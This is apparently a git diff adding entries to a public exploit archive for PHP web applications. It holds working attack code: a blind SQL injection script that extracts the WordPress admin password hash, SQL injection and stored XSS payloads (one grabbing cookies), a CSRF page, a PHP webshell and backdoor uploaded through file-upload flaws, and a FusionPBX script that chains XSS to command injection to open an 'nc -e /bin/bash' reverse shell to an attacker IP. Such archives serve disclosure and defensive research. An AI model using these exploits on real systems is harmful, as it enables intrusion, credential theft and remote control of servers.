+dictionary = '@._-$/\\"£%&;§+*1234567890qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM'
+flag = True
+username = "username"
+password = "password"
+temp_password = ""
+TIME = 0.5
+
+def login(username, password):
+    payload = {
+        'log': username,
+        'pwd': password,
+        'wp-submit': 'Login',
+        'redirect_to': 'http://localhost/wordpress/wp-admin/',
+        'testcookie': 1
+    }
+    session.post('http://localhost/wordpress/wp-login.php', data=payload)
+
+def print_string(str):
+    print "\033c"
+    print str
+
+def get_admin_pass():
+    len_pwd = 1
+    global flag
+    global temp_password
+    while flag:
+        flag = False
+        ch_temp = ''
+        for ch in dictionary:
+            print_string("[*] Password dump: " + temp_password + ch)
+            ch_temp = ch
+            start_time = time.time()
+            r = session.get(url_vuln + ',(case+when+(select+ascii(substring(user_pass,' + str(len_pwd) + ',' + str(len_pwd) + '))+from+wp_users+where+id%3d1)%3d' + str(ord(ch)) + '+then+(select+sleep(' + str(TIME) + ')+from+wp_users+limit+1)+else+2+end)+asc%3b')
+            elapsed_time = time.time() - start_time
+            if elapsed_time >= TIME:
+                flag = True
+                break
+        if flag:
+            temp_password += ch_temp
+            len_pwd += 1
+
+login(username, password)
+get_admin_pass()
+print_string("[+] Password found: " + temp_password)
\ No newline at end of file
diff --git a/exploits/php/webapps/46959.txt b/exploits/php/webapps/46959.txt
new file mode 100644
index 000000000..8c2acb382
--- /dev/null
+++ b/exploits/php/webapps/46959.txt
@@ -0,0 +1,15 @@
+# Exploit Title: IceWarp <=10.4.4 local file include
+# Date: 02/06/2019
+# Exploit Author: JameelNabbo
+# Website: uitsec.com
+# Vendor Homepage: http://www.icewarp.com
+# Software Link: https://www.icewarp.com/downloads/trial/
+# Version: 10.4.4
+# Tested on: Windows 10
+# CVE: CVE-2019-12593
+POC:
+
+http://example.com/webmail/calendar/minimizer/index.php?style=[LFI]
+
+Example:
+http://example.com/webmail/calendar/minimizer/index.php?style=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
\ No newline at end of file
diff --git a/exploits/php/webapps/46977.txt b/exploits/php/webapps/46977.txt
new file mode 100644
index 000000000..e297f7737
--- /dev/null
+++ b/exploits/php/webapps/46977.txt
@@ -0,0 +1,65 @@
+# Exploit Title: UliCMS 2019.1 "Spitting Lama" - Stored Cross-Site Scripting
+# Google Dork: intext:"by UliCMS"
+# Date: 2019-05-12
+# Exploit Author: Unk9vvN
+# Vendor Homepage: https://en.ulicms.de
+# Software Link: https://www.ulicms.de/aktuelles.html?single=ulicms-20191-spitting-lama-ist-fertig
+# Version: 2019.1
+# Tested on: Kali Linux
+# CVE : CVE-2019-11398
+
+
+# Description
+# This vulnerability is in the authentication state and is located in the CMS management panel, and the type of vulnerability is Stored and the vulnerability parameters are as follows.
+
+# Vuln One
+# URI: POST /ulicms/admin/index.php?action=languages
+# Parameter: name="><script>alert('UNK9VVN')</script>
+
+# Vuln Two
+# URI: POST /ulicms/admin/index.php?action=pages_edit&page=23
+# Parameter: systemname="><script>alert('UNK9VVN')</script>
+
+
+#
+# PoC POST (Cross Site Scripting Stored)
+#
+POST /ulicms/admin/index.php HTTP/1.1
+Host: XXXXXXXX.ngrok.io
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://XXXXXXXX.ngrok.io/ulicms/admin/index.php?action=languages
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 165
+Cookie: 5cfc346c4b87e_SESSION=mm4j0oak7boshm2fsn5ttimip8
+Connection: close
+Upgrade-Insecure-Requests: 1
+DNT: 1
+
+csrf_token=c95ab2823eccb876804606aa6c60f4d9&sClass=LanguageController&sMethod=create&language_code=U9N&name=%22%3E%3Cscript%3Ealert%28%27UNK9VVN%27%29%3C%2Fscript%3E
+
+
+#
+# PoC POST (Cross Site Scripting Stored)
+#
+POST /ulicms/admin/index.php HTTP/1.1
+Host: XXXXXXXX.ngrok.io
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://XXXXXXXX.ngrok.io/ulicms/admin/index.php?action=pages_edit&page=23
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Content-Length: 904
+Cookie: 5cfc346c4b87e_SESSION=mm4j0oak7boshm2fsn5ttimip8
+Connection: close
+DNT: 1
+
+csrf_token=c95ab2823eccb876804606aa6c60f4d9&sClass=PageController&sMethod=edit&edit_page=edit_page&page_id=23&systemname=%22%3E%3Cscript%3Ealert%28%27UNK9VVN%27%29%3C%2Fscript%3E&page_title=UNK9VVN&alternate_title=assdasdasd&show_headline=1&type=page&language=en&menu=top&position=0&parent=NULL&activated=1&target=_self&hidden=0&category=1&menu_image=&redirection=&link_to_language=&meta_description=&meta_keywords=&article_author_name=&article_author_email=&comment_homepage=&article_date=2019-06-09T00%3A40%3A01&excerpt=&og_title=&og_description=&og_type=&og_image=&list_type=null&list_language=&list_category=0&list_menu=&list_parent=NULL&list_order_by=title&list_order_direction=asc&limit=0&list_use_pagination=0&module=null&video=&audio=&image_url=&text_position=before&article_image=&autor=1&group_id=1&comments_enabled=null&cache_control=auto&theme=&access%5B%5D=all&custom_data=%7B%0A%0A%7D&page_content=
+
+
+# Discovered by:
+t.me/Unk9vvN
\ No newline at end of file
diff --git a/exploits/php/webapps/46981.txt b/exploits/php/webapps/46981.txt
new file mode 100644
index 000000000..011def1cb
--- /dev/null
+++ b/exploits/php/webapps/46981.txt
@@ -0,0 +1,22 @@
+# Exploit Title: Authenticated code execution in `insert-or-embed-articulate-content-into-wordpress` Wordpress plugin
+# Description: It is possible to upload and execute a PHP file using the plugin option to upload a zip archive 
+# Date: june 2019
+# Exploit Author: xulchibalraa
+# Vendor Homepage: https://wordpress.org/plugins/insert-or-embed-articulate-content-into-wordpress/
+# Software Link: https://downloads.wordpress.org/plugin/insert-or-embed-articulate-content-into-wordpress.4.2995.zip
+# Version: 4.2995 <= 4.2997 
+# Tested on: Wordpress 5.1.1, PHP 5.6 
+# CVE : -
+
+
+## 1. Create a .zip archive with 2 files: index.html, index.php
+
+echo "<html>hello</html>" > index.html
+echo "<?php echo system($_GET['cmd']); ?>" > index.php
+zip poc.zip index.html index.php 
+
+## 2. Log in to wp-admin with any user role that has access to the plugin functionality (by default even `Contributors` role have access to it)
+## 3. Create a new Post -> Select `Add block` -> E-Learning -> Upload the poc.zip -> Insert as: Iframe -> Insert (just like in tutorial https://youtu.be/knst26fEGCw?t=44 ;)
+## 4. Access the webshell from the URL displayed after upload similar to 
+
+http://website.com/wp-admin/uploads/articulate_uploads/poc/index.php?cmd=whoami
\ No newline at end of file
diff --git a/exploits/php/webapps/46982.txt b/exploits/php/webapps/46982.txt
new file mode 100644
index 000000000..9ac066e84
--- /dev/null
+++ b/exploits/php/webapps/46982.txt
@@ -0,0 +1,42 @@
+# Exploit Title: Cross Site Request Forgery (CSRF)
+# Date: 11 June 2019
+# Exploit Author: Riemann
+# Vendor Homepage: https://www.phpmyadmin.net/
+# Software Link: https://www.phpmyadmin.net/downloads/
+# Version: 4.8
+# Tested on: UBUNTU 16.04 LTS -Installed Docker image - docker pull phpmyadmin/phpmyadmin:4.8 
+# CVE : 2019-12616
+
+# Description
+# An issue was discovered in phpMyAdmin before 4.9.0. A vulnerability was found that allows an attacker to trigger a CSRF attack against a phpMyAdmin user. The attacker can trick the user, for instance through a broken <img> tag pointing at the victim's phpMyAdmin database, and the attacker can potentially deliver a payload (such as a specific INSERT or DELETE statement) to the victim.	
+
+
+#VULNERABILITY:
+The following request which is a form submission is done using the ¨GET¨ request instead of using ¨POST
+<form method="get" action="index.php" class="disableAjax">
+
+GET http://localhost:9000/tbl_sql.php?sql_query=INSERT+INTO+%60pma__bookmark%60+(%60id%60%2C+%60dbase%60%2C+%60user%60%2C+%60label%60%2C+%60query%60)+VALUES+(DAYOFWEEK(%27%27)%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27%27)&show_query=1&db=phpmyadmin&table=pma__bookmark HTTP/1.1
+
+User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:67.0) Gecko/20100101 Firefox/67.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Connection: keep-alive
+Cookie: pmaCookieVer=5; pma_lang=en; pma_collation_connection=utf8mb4_unicode_ci; pmaUser-1=%7B%22iv%22%3A%22M16ZzlA0rqF9BZ1jFsssjQ%3D%3D%22%2C%22mac%22%3A%22804941d12fceca0997e181cbcb8427d68c668240%22%2C%22payload%22%3A%22mD9juTxAYhC7lA7XPWHWOw%3D%3D%22%7D; phpMyAdmin=9bdd66557e399fc1447bf253bc2dc133
+Upgrade-Insecure-Requests: 1
+Host: localhost:9000
+
+The attacker can easily create a fake hyperlink containing the request that wants to execute on behalf the user,in this way making possible a CSRF attack due to the wrong use of HTTP method
+
+#POC
+<!doctype html>
+
+<html lang="en">
+<head>
+  <meta charset="utf-8">
+  <title>POC CVE-2019-12616</title>
+</head>
+
+<body>
+<a href="http://localhost:9000/tbl_sql.php?sql_query=INSERT+INTO+`pma__bookmark`+(`id`%2C+`dbase`%2C+`user`%2C+`label`%2C+`query`)+VALUES+(DAYOFWEEK('')%2C+''%2C+''%2C+''%2C+'')&show_query=1&db=phpmyadmin&table=pma__bookmark">View my Pictures!</a>
+</body>
+</html>
\ No newline at end of file
diff --git a/exploits/php/webapps/46985.py b/exploits/php/webapps/46985.py
new file mode 100755
index 000000000..b883eeafd
--- /dev/null
+++ b/exploits/php/webapps/46985.py
@@ -0,0 +1,85 @@
+# Exploit Title: FusionPBX <= 4.4.3 Command Injection RCE via XSS 
+# Date: 06-11-2019
+# Exploit Author: Dustin Cobb
+# Vendor Homepage: https://www.fusionpbx.com
+# Software Link: https://https://github.com/fusionpbx/fusionpbx
+# Version: <= 4.4.3
+# Tested on: Debian 8.11
+# CVE : CVE-2019-11408 (XSS) AND CVE-2019-11409 (Command Injection RCE)
+
+#!/usr/bin/python
+import socket, sys
+from random import randint
+from hashlib import md5
+
+# Exploitation steps:
+#
+# 1. First, encode an XSS payload that will be injected into the
+#    “Caller ID Number” field, or “User” component of the SIP 
+#    “From” URI.
+# 2. Connect to external SIP profile port and send a SIP INVITE 
+#    packet with XSS payload injected into the From Field.
+# 3. XSS payload will fire operator panel screen (CVE-2019-11408), which 
+#    is designed to be monitored constantly by a call center operator.
+# 4. Once XSS code executes, a call is made to the exec.php script 
+#    (CVE-2019-11409) with a reverse shell payload that connects back to 
+#    a netcat listener on the attacker system.  
+
+
+# edit these variables to set up attack
+victim_addr="10.10.10.10"
+victim_host="victim-pbx1.example.com"
+victim_num="12125551212"
+
+attacker_ip="10.10.10.20"
+attacker_port=4444
+
+def encode(val):
+    ret=""
+
+    for c in val:
+        ret+="\\x%02x" % ord(c)
+
+    return ret
+
+callid=md5(str(randint(0,99999999))).hexdigest()
+
+cmd="nc -e /bin/bash %s %d" % (attacker_ip, attacker_port)
+payload="q=new XMLHttpRequest();q.open('GET','exec.php?cmd=system %s',true);q.send();" % cmd
+
+xss=";tag=%s
+To: 
+Call-ID: %s
+CSeq: 1 INVITE
+Contact: 
+Max-Forwards: 70
+User-Agent: Exploit POC
+Content-Type: application/sdp
+Allow: INVITE, ACK, OPTIONS, CANCEL, BYE, SUBSCRIBE, NOTIFY, INFO, REFER, UPDATE, MESSAGE
+Content-Length: 209
+
+v=0
+o=root 1204310316 1204310316 IN IP4 127.0.0.1
+s=Media Gateway
+c=IN IP4 127.0.0.1
+t=0 0
+m=audio 4446 RTP/AVP 0 101
+a=rtpmap:0 PCMU/8000
+a=rtpmap:101 telephone-event/8000
+a=fmtp:101 0-16
+a=ptime:2
+a=sendrecv""" % (victim_num, victim_host, xss, callid, victim_num, victim_host, callid)
+
+payload=payload.replace("\n","\r\n")
+
+s=socket.socket()
+
+s.connect((victim_addr,5080))
+
+print payload
+print
+
+s.send(payload)
+data=s.recv(8192)
+
+print data
\ No newline at end of file
diff --git a/exploits/php/webapps/47013.py b/exploits/php/webapps/47013.py
new file mode 100755
index 000000000..3d3638d0c
--- /dev/null
+++ b/exploits/php/webapps/47013.py
@@ -0,0 +1,92 @@
+# Exploit Title: Blind SQL injection in WebERP.
+# Date: June 10, 2019
+# Exploit Author: Semen Alexandrovich Lyhin (https://www.linkedin.com/in/semenlyhin/)
+# Vendor Homepage: http://www.weberp.org/
+# Version: 4.15
+
+# A malicious query can be sent in base64 encoding to unserialize() function. It can be deserialized as an array without any sanitization then. 
+# After it, each element of the array is passed directly to the SQL query. 
+
+import requests
+import base64
+import os
+import subprocess
+from bs4 import BeautifulSoup
+import re
+import time
+import sys
+
+def generatePayload(PaidAmount="0",PaymentId="0"):
+    #THIS FUNCTION IS INSECURE BY DESIGN
+    ToSerialize = r"[\"%s\" => \"%s\"]" % (PaymentId, PaidAmount)
+    return os.popen("php -r \"echo base64_encode(serialize(" + ToSerialize + "));\"").read()
+
+def getCookies(ip, CompanyNameField, usr, pwd):
+    r = requests.get("http://" + ip + "/index.php")
+    s = BeautifulSoup(r.text, 'lxml')
+    m = re.search("FormID.*>", r.text)
+    FormID = m.group(0).split("\"")[2]
+    
+    data = {"FormID":FormID,"CompanyNameField":CompanyNameField,"UserNameEntryField":usr,"Password":pwd,"SubmitUser":"Login"}
+    r = requests.post("http://" + ip + "/index.php", data)
+    
+    return {"PHPSESSIDwebERPteam":r.headers["Set-Cookie"][20:46]}
+    
+
+def addSupplierID(name, cookies, proxies):
+    r = requests.get("http://" + ip + "/Suppliers.php", cookies=cookies)
+    s = BeautifulSoup(r.text, 'lxml')
+    m = re.search("FormID.*>", r.text)
+    FormID = m.group(0).split("\"")[2]
+    
+    data = {"FormID":FormID,"New":"Yes","SupplierID":name,"SuppName":name,"SupplierType":"1","SupplierSince":"01/06/2019","BankPartics":"","BankRef":"0",
+            "PaymentTerms":"20","FactorID":"0","TaxRef":"","CurrCode":"USD","Remittance":"0","TaxGroup":"1","submit":"Insert+New+Supplier"}
+            
+    requests.post("http://" + ip + "/Suppliers.php", data=data,cookies=cookies,proxies=proxies)
+
+
+def runExploit(cookies, supplier_id, payload, proxies):
+    r = requests.get("http://" + ip + "/Payments.php", cookies=cookies)
+    s = BeautifulSoup(r.text, 'lxml')
+    m = re.search("FormID.*>", r.text)
+    FormID = m.group(0).split("\"")[2]
+    
+    data = {"FormID":FormID,
+            "CommitBatch":"2",
+            "BankAccount":"1",
+            "DatePaid":"01/06/2019",
+            "PaidArray":payload}
+         
+    requests.post("http://" + ip + "/Payments.php?identifier=1559385755&SupplierID=" + supplier_id, data=data,cookies=cookies,proxies=proxies)
+
+
+if __name__ == "__main__":
+    #proxies = {'http':'127.0.0.1:8080'}
+    proxies = {}
+    
+    if len(sys.argv) != 6:
+        print '(+) usage: %s <target> <path> <login> <password> <order>' % sys.argv[0]
+        print '(+) eg: %s 127.0.0.1 "weberp/webERP/" admin weberp 1' % sys.argv[0]
+        print 'Order means the number of company on the website. Can be gathered from the login page and usually equals 0 or 1'
+        exit()
+    
+    ip = sys.argv[1] + "/" + sys.argv[2]
+    
+    #if don't have php, set Payload to the next one to check this time-based SQLi: YToxOntpOjA7czoyMzoiMCB3aGVyZSBzbGVlcCgxKT0xOy0tIC0iO30=
+    #payload = generatePayload("0 where sleep(1)=1;-- -", "0")
+    
+    payload = generatePayload("0", "' or sleep(5) and '1'='1")
+    
+    #get cookies
+    cookies = getCookies(ip, sys.argv[5], sys.argv[3], sys.argv[4])
+    
+    addSupplierID("GARUMPAGE", cookies, proxies)
+    
+    t1 = time.time()
+    runExploit(cookies, "GARUMPAGE", payload, proxies)
+    t2 = time.time()
+    
+    if (t2-t1>4):
+        print "Blind sqli is confirmed"
+    else:
+        print "Verify input data and try again"
\ No newline at end of file
diff --git a/exploits/php/webapps/47021.txt b/exploits/php/webapps/47021.txt
new file mode 100644
index 000000000..55ec0d1ba
--- /dev/null
+++ b/exploits/php/webapps/47021.txt
@@ -0,0 +1,117 @@
+# Exploit Title: dotProject 2.1.9 - Multiple Sql Injection (Poc)
+# Exploit Author: Metin Yunus Kandemir (kandemir)
+# Vendor Homepage: https://dotproject.net
+# Software Link: https://github.com/dotproject/dotProject/archive/v2.1.9.zip
+# Version: 2.1.9
+# Category: Webapps
+# Tested on: Xampp for Windows
+# Software Description : dotProject is a volunteer supported Project Management application. There is no "company" behind this project, it is managed, maintained, developed and supported by a volunteer group and by the users themselves.
+
+==================================================================
+
+
+event_id (POST) - Sql injection PoC
+
+POST /dotProject-2.1.9/index.php?m=calendar HTTP/1.1
+Host: xxx.xxx.x.xx
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://xxx.xxx.x.xx/dotProject-2.1.9/index.php?m=calendar&a=addedit
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 273
+Cookie: dotproject=gfkt21luioqv9eoh25hdaloe7v; client_lang=english; client_login_name=test1
+Connection: close
+Upgrade-Insecure-Requests: 1
+
+dosql=do_event_aed&event_id=0&event_project=[SQLi]&event_assigned=1&event_title=test&
+event_description=hkffkfuy&event_type=0&event_project=0&event_start_date=20190621&start_time=080000&event_end_date=20190621&
+end_time=170000&event_recurs=0&event_times_recuring=1&mail_invited=on
+
+
+
+
+Parameter: event_id (POST)
+    Type: boolean-based blind
+    Title: AND boolean-based blind - WHERE or HAVING clause
+    Payload: dosql=do_event_aed&event_id=0) AND 3236=3236-- rnpG&event_project=0&event_assigned=1&event_title=test&event_description=hkffkfuy&event_type=0&event_project=0&event_start_date=20190621&start_time=080000&event_end_date=20190621&end_time=170000&event_recurs=0&event_times_recuring=1&mail_invited=on
+
+    Type: error-based
+    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
+    Payload: dosql=do_event_aed&event_id=0) AND (SELECT 7581 FROM(SELECT COUNT(*),CONCAT(0x7170787a71,(SELECT (ELT(7581=7581,1))),0x71627a6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- bOIA&event_project=0&event_assigned=1&event_title=test&event_description=hkffkfuy&event_type=0&event_project=0&event_start_date=20190621&start_time=080000&event_end_date=20190621&end_time=170000&event_recurs=0&event_times_recuring=1&mail_invited=on
+
+    Type: time-based blind
+    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+    Payload: dosql=do_event_aed&event_id=0) AND (SELECT 6637 FROM (SELECT(SLEEP(5)))bNDB)-- NfAk&event_project=0&event_assigned=1&event_title=test&event_description=hkffkfuy&event_type=0&event_project=0&event_start_date=20190621&start_time=080000&event_end_date=20190621&end_time=170000&event_recurs=0&event_times_recuring=1&mail_invited=on
+
+    Type: UNION query
+    Title: Generic UNION query (NULL) - 1 column
+    Payload: dosql=do_event_aed&event_id=0) UNION ALL SELECT CONCAT(0x7170787a71,0x646772547a6e58774c464e54416963614c64646c7a6f6c745748597350686f535979714443794859,0x71627a6271)-- xXFB&event_project=0&event_assigned=1&event_title=test&event_description=hkffkfuy&event_type=0&event_project=0&event_start_date=20190621&start_time=080000&event_end_date=20190621&end_time=170000&event_recurs=0&event_times_recuring=1&mail_invited=on
+
+
+
+==================================================================
+
+
+MULTIPART project_id ((custom) POST) - Sql Injection Poc
+
+POST /dotProject-2.1.9/index.php?m=projects HTTP/1.1
+Host: 192.168.1.33
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://192.168.1.33/dotProject-2.1.9/index.php?m=projects&a=addedit
+Content-Type: multipart/form-data; boundary=---------------------------9310663371787104596119761620
+Content-Length: 2749
+Cookie: dotproject=gfkt21luioqv9eoh25hdaloe7v; client_lang=english; client_login_name=test1
+Connection: close
+Upgrade-Insecure-Requests: 1
+
+-----------------------------9310663371787104596119761620
+Content-Disposition: form-data; name="dosql"
+
+do_project_aed
+-----------------------------9310663371787104596119761620
+Content-Disposition: form-data; name="project_id"
+
+[SQLi]
+-----------------------------9310663371787104596119761620
+Content-Disposition: form-data; name="project_creator"
+
+1
+.
+..snip
+..snip
+.
+
+-----------------------------9310663371787104596119761620
+Content-Disposition: form-data; name="import_tasks_from"
+
+0
+-----------------------------9310663371787104596119761620
+Content-Disposition: form-data; name="project_description"
+
+fasdf
+-----------------------------9310663371787104596119761620--
+
+
+
+Parameter: MULTIPART project_id ((custom) POST)
+    Type: boolean-based blind
+    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
+    Payload: 0 RLIKE (SELECT (CASE WHEN (6146=6146) THEN '' ELSE 0x28 END))
+
+    Type: error-based
+    Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
+    Payload: 0 AND EXTRACTVALUE(9751,CONCAT(0x5c,0x716b767871,(SELECT (ELT(9751=9751,1))),0x716b6a6a71))
+
+    Type: time-based blind
+    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+    Payload: 0 AND (SELECT 6725 FROM (SELECT(SLEEP(5)))WETe)
+
+
+#
+#
+#
\ No newline at end of file
diff --git a/exploits/php/webapps/47022.txt b/exploits/php/webapps/47022.txt
new file mode 100644
index 000000000..c42ffb53b
--- /dev/null
+++ b/exploits/php/webapps/47022.txt
@@ -0,0 +1,32 @@
+# Exploit Title: [Remote Command Execution through Unvalidated File Upload in SeedDMS versions <5.1.11]
+# Google Dork: [NA]
+# Date: [20-June-2019]
+# Exploit Author: [Nimit Jain](https://www.linkedin.com/in/nimitiitk)(https://secfolks.blogspot.com)
+# Vendor Homepage: [https://www.seeddms.org]
+# Software Link: [https://sourceforge.net/projects/seeddms/files/]
+# Version: [SeedDMS versions <5.1.11] (REQUIRED)
+# Tested on: [NA]
+# CVE : [CVE-2019-12744]
+
+Exploit Steps:
+
+Step 1: Login to the application and under any folder add a document.
+Step 2: Choose the document as a simple php backdoor file or any backdoor/webshell could be used.
+
+PHP Backdoor Code: 
+<?php
+
+if(isset($_REQUEST['cmd'])){
+        echo "<pre>";
+        $cmd = ($_REQUEST['cmd']);
+        system($cmd);
+        echo "</pre>";
+        die;
+}
+
+?>
+
+Step 3: Now after uploading the file check the document id corresponding to the document.
+Step 4: Now go to example.com/data/1048576/"document_id"/1.php?cmd=cat+/etc/passwd to get the command response in browser.
+
+Note: Here "data" and "1048576" are default folders where the uploaded files are getting saved.
\ No newline at end of file
diff --git a/exploits/php/webapps/47023.txt b/exploits/php/webapps/47023.txt
new file mode 100644
index 000000000..293620d5d
--- /dev/null
+++ b/exploits/php/webapps/47023.txt
@@ -0,0 +1,15 @@
+# Exploit Title: [Persistent Cross-Site Scripting or Stored XSS in out/out.UsrMgr.php in SeedDMS before 5.1.11]
+# Google Dork: [NA]
+# Date: [20-June-2019]
+# Exploit Author: [Nimit Jain](https://www.linkedin.com/in/nimitiitk)(https://secfolks.blogspot.com)
+# Vendor Homepage: [https://www.seeddms.org]
+# Software Link: [https://sourceforge.net/projects/seeddms/files/]
+# Version: [< 5.1.11] (REQUIRED)
+# Tested on: [NA]
+# CVE : [CVE-2019-12745]
+
+Proof-of-Concept:
+
+Step 1: Login to the application and go to My account and edit user details.
+Step 2: Change the name by adding <script>alert("name")</script> 
+Step 3: Now browse to user management option in Admin-tools and click on choose user to execute the previously inserted javascript.
\ No newline at end of file
diff --git a/exploits/php/webapps/47024.txt b/exploits/php/webapps/47024.txt
new file mode 100644
index 000000000..837a66e09
--- /dev/null
+++ b/exploits/php/webapps/47024.txt
@@ -0,0 +1,15 @@
+# Exploit Title: [Persistent Cross-Site Scripting or Stored XSS in out/out.GroupMgr.php in SeedDMS before 5.1.11]
+# Google Dork: [NA]
+# Date: [17-June-2019]
+# Exploit Author: [Nimit Jain](https://www.linkedin.com/in/nimitiitk)(https://secfolks.blogspot.com)
+# Vendor Homepage: [https://www.seeddms.org]
+# Software Link: [https://sourceforge.net/projects/seeddms/files/]
+# Version: [< 5.1.11] (REQUIRED)
+# Tested on: [NA]
+# CVE : [CVE-2019-12801]
+
+Proof-of-Concept:
+
+Step 1: Login to the application and go to Groups Management in Admin tools.
+Step 2: Now create a new group as hello<script>alert("group")</script>
+Step 3: Now save it click on choose group to execute the javascript inserted above.
\ No newline at end of file
diff --git a/exploits/php/webapps/47034.txt b/exploits/php/webapps/47034.txt
new file mode 100644
index 000000000..a7f543b7d
--- /dev/null
+++ b/exploits/php/webapps/47034.txt
@@ -0,0 +1,35 @@
+[+] Sql Injection on AZADMIN CMS of HIDEA v1.0
+
+[+] Date: 24/06/2019
+
+[+] CWE Number : CWE-89
+
+[+] Risk: High
+
+[+] Author: Felipe Andrian Peixoto
+
+[+] Vendor Homepage: https://www.hidea.com/
+
+[+] Contact: felipe_andrian@hotmail.com
+
+[+] Tested on: Windows 7 and Linux
+
+[+] Vulnerable Files: news_det.php
+
+[+] Dork : inurl:"news_det.php?cod=" HIDEA
+
+[+] Exploit : https://www.site.com/news_det.php?cod=[SQL Injection] 
+
+[+] Payload : /*!50000and*/+/*!50000extractvalue*/(0x0a,/*!50000concat*/(0x0a,0x73337830753a,(/*!50000select*/%20database()),0x3a7333783075))--+-
+
+[+] PoC:
+         http://site.com/news_det.php?cod=-1/*!50000and*/+/*!50000extractvalue*/(0x0a,/*!50000concat*/(0x0a,0x73337830753a,(/*!50000select*/%20database()),0x3a7333783075))--+-
+    
+        https://site.com/news_det.php?cod=77/*!50000and*/+/*!50000extractvalue*/(0x0a,/*!50000concat*/(0x0a,0x73337830753a,(/*!50000select*/%20database()),0x3a7333783075))--+-
+
+[+] Example:
+
+       curl 'http://site.com/news_det.php?cod=-1/*!50000and*/+/*!50000extractvalue*/(0x0a,/*!50000concat*/(0x0a,0x73337830753a,(/*!50000select*/%20database()),0x3a7333783075))--+-' -H 'Host: www.centroconcept.com.br' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H 'Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3' --compressed -H 'Cookie: PHPSESSID=dv0rd3b6rbghah80getonfp601' -H 'DNT: 1' -H 'Connection: keep-alive' -H 'Upgrade-Insecure-Requests: 1'
+
+		XPATH syntax error: '
+		s3x0u:centroco_ger:s3x0u'
\ No newline at end of file
diff --git a/exploits/php/webapps/47036.txt b/exploits/php/webapps/47036.txt
new file mode 100644
index 000000000..bd740135b
--- /dev/null
+++ b/exploits/php/webapps/47036.txt
@@ -0,0 +1,33 @@
+# Exploit Title: iLive - Intelligent WordPress Live Chat Support
+Plugin v1.0.4 Stored XSS Injection
+# Google Dork: -
+# Date: 2019/06/25
+# Exploit Author: m0ze
+# Vendor Homepage: http://www.ilive.wpapplab.com/
+# Software Link:
+https://codecanyon.net/item/ilive-wordpress-live-chat-support-plugin/20496563
+http://www.ilive.wpapplab.com/
+# Version: 1.0.4
+# Tested on: Windows 10 / Parrot OS
+# CVE : -
+
+Info:
+
+Weak security measures like bad textarea data filtering has been
+discovered in the «iLive - Intelligent WordPress Live Chat Support
+Plugin». Current version of this premium WordPress plugin is 1.0.4.
+
+
+
+PoC:
+Go to the demo website http://www.site.com/ and open chat window by clicking on «Chat» icon on the bottom right corner. 
+Use your payload inside input field and press [Enter]. 
+Provided exaple payloads working on the admin area, so it's possible to steal admin cookies or force a redirect to any other website.
+To check your XSS Injections log in http://www.site.com/wp-admin/ and go to this page http://www.site.com/wp-admin/admin.php?page=ilive-chat-page then select your chat alias from the list. Keep in mind that there is 3 demo operators, so you must log in as operator assigned to your chat (operator number will be available after you send the first message in chat).
+
+Example #1: <img src=https://i.imgur.com/zRm8R9z.gif onload=alert(`m0ze`);>
+Example #2: <img src=https://i.imgur.com/zRm8R9z.gif
+onload=alert(document.cookie);>
+Example #3: <img src=x onerror=window.location.replace('https://m0ze.ru/');>
+Example #4: <!--<img src="--><img src=x onerror=(alert)(`m0ze`)//">
+Example #5: <!--<img src="--><img src=x onerror=(alert)(document.cookie)//">
\ No newline at end of file
diff --git a/exploits/php/webapps/47037.txt b/exploits/php/webapps/47037.txt
new file mode 100644
index 000000000..c110d6d72
--- /dev/null
+++ b/exploits/php/webapps/47037.txt
@@ -0,0 +1,26 @@
+# Exploit Title: Live Chat Unlimited v2.8.3 Stored XSS Injection
+# Google Dork: inurl:"wp-content/plugins/screets-lcx"
+# Date: 2019/06/25
+# Exploit Author: m0ze
+# Vendor Homepage: https://screets.com/
+# Software Link: https://codecanyon.net/item/wordpress-live-chat-plugin/3952877
+# Version: 2.8.3
+# Tested on: Windows 10 / Parrot OS
+# CVE : -
+
+
+Info:
+
+Weak security measures like bad input field data filtering has been
+discovered in the «Live Chat Unlimited». Current version of this
+premium WordPress plugin is 2.8.3.
+
+
+
+PoC:
+
+Go to the demo website https://site.com/try/lcx/night-bird/ and open chat window by clicking on «Open/close» link, then click on «Online mode» to go online. Use your payload inside input field and press [Enter]. 
